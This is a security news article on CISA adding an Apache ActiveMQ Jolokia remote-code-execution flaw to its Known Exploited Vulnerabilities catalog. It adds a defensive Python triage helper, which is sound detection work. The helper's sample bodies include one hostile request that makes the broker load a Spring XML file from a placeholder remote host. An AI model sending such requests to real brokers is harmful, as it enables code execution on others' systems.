U.S. CISA adds a flaw in Apache ActiveMQ to its Known Exploited Vulnerabilities catalog
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a severe vulnerability in Apache ActiveMQ (CVE-2026-34197) to its Known Exploited Vulnerabilities catalog. The flaw stems from improper input validation and unsafe code execution, affects the Jolokia JMX-HTTP bridge, and can lead to remote code execution. Users are advised to upgrade to version 5.19.4 or 6.2.3 to fix the issue. 2026-4-17 07:39:39 Author: securityaffairs.com


The U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds a flaw in Apache ActiveMQ to its Known Exploited Vulnerabilities catalog

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added a flaw in Apache ActiveMQ, tracked as CVE-2026-34197 (CVSS score of 8.8), to its Known Exploited Vulnerabilities (KEV) catalog.

CVE-2026-34197 is a critical flaw in Apache ActiveMQ caused by improper input validation and unsafe code execution. It affects the Jolokia JMX-HTTP bridge exposed via the web console, which allows execution of certain management operations.

An authenticated attacker can send crafted requests with a malicious discovery URI that forces the broker to load a remote Spring XML configuration. Because Spring initializes beans before validation, attackers can execute arbitrary code, for example via Runtime.exec(). This results in remote code execution on the broker’s JVM.

“Apache ActiveMQ Classic exposes the Jolokia JMX-HTTP bridge at /api/jolokia/ on the web console. The default Jolokia access policy permits exec operations on all ActiveMQ MBeans (org.apache.activemq:*), including BrokerService.addNetworkConnector(String) and BrokerService.addConnector(String).” reads the advisory. “An authenticated attacker can invoke these operations with a crafted discovery URI that triggers the VM transport’s brokerConfig parameter to load a remote Spring XML application context using ResourceXmlApplicationContext. Because Spring’s ResourceXmlApplicationContext instantiates all singleton beans before the BrokerService validates the configuration, arbitrary code execution occurs on the broker’s JVM through bean factory methods such as Runtime.exec().”

The issue affects versions before 5.19.4 and 6.2.3, and users are strongly advised to upgrade.
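As an added example (not part of the article, and not ActiveMQ's or Jolokia's own tooling), the following Python helper triages Jolokia request bodies, in the JSON shape Jolokia's protocol uses, for the conditions the advisory describes: exec calls on org.apache.activemq:* MBeans that target addNetworkConnector or addConnector, escalated when a brokerConfig parameter in the connector URI points at a remote http(s) resource. The sample bodies and the remote host name are constructed placeholders, and the severity labels are the example's own choice.

```python
import json
import re
from dataclasses import dataclass
from urllib.parse import urlsplit

# Operations the advisory names as reachable through Jolokia exec (taken from the article).
SENSITIVE_OPS = {"addNetworkConnector", "addConnector"}
REMOTE_SCHEMES = {"http", "https"}
BROKER_CONFIG_RE = re.compile(r"brokerConfig=([^&)\s]+)")

@dataclass
class Finding:
    severity: str
    reason: str
    mbean: str
    operation: str
def has_remote_broker_config(uri: str) -> bool:
    """True if any brokerConfig parameter in a transport URI points at an http(s) resource."""
    # Scan the whole string: brokerConfig may sit inside a nested composite URI.
    return any(urlsplit(m.group(1)).scheme.lower() in REMOTE_SCHEMES
               for m in BROKER_CONFIG_RE.finditer(uri))

def triage_jolokia_request(body: str) -> list:
    """Classify one Jolokia POST body (single or bulk JSON request) against the advisory."""
    findings = []
    try:
        parsed = json.loads(body)
    except json.JSONDecodeError:
        return findings  # not a Jolokia JSON request; nothing to classify
    for req in parsed if isinstance(parsed, list) else [parsed]:
        if not isinstance(req, dict) or req.get("type") != "exec":
            continue
        mbean = str(req.get("mbean", ""))
        op = str(req.get("operation", "")).split("(")[0]  # drop "(java.lang.String)" signature
        if not mbean.startswith("org.apache.activemq:") or op not in SENSITIVE_OPS:
            continue
        args = [str(a) for a in req.get("arguments", [])]
        if any(has_remote_broker_config(a) for a in args):
            findings.append(Finding("critical", "remote brokerConfig in connector URI", mbean, op))
        else:
            findings.append(Finding("medium", "exec of connector-management operation", mbean, op))
    return findings
# Constructed sample request bodies (not captured traffic); the remote host is a placeholder.
SAMPLE_BODIES = [
    '{"type":"read","mbean":"org.apache.activemq:type=Broker,brokerName=localhost","attribute":"TotalEnqueueCount"}',
    '{"type":"exec","mbean":"org.apache.activemq:type=Broker,brokerName=localhost",'
    '"operation":"addNetworkConnector(java.lang.String)","arguments":["static:(tcp://broker2:61616)"]}',
    '{"type":"exec","mbean":"org.apache.activemq:type=Broker,brokerName=localhost",'
    '"operation":"addConnector(java.lang.String)","arguments":["vm://localhost?brokerConfig=https://EXAMPLE-REMOTE-HOST/ctx.xml"]}',
]
```

Feeding the web console's request bodies through `triage_jolokia_request` separates routine connector administration (medium, worth an audit entry) from requests that would pull a remote Spring context (critical).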

According to Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities, FCEB agencies have to address the identified vulnerabilities by the due date to protect their networks against attacks exploiting the flaws in the catalog.

Experts also recommend that private organizations review the Catalog and address the vulnerabilities in their infrastructure.

CISA orders federal agencies to fix the vulnerability by April 30, 2026.

Pierluigi Paganini





Source: https://securityaffairs.com/190917/security/u-s-cisa-adds-a-flaw-in-apache-activemq-to-its-known-exploited-vulnerabilities-catalog.html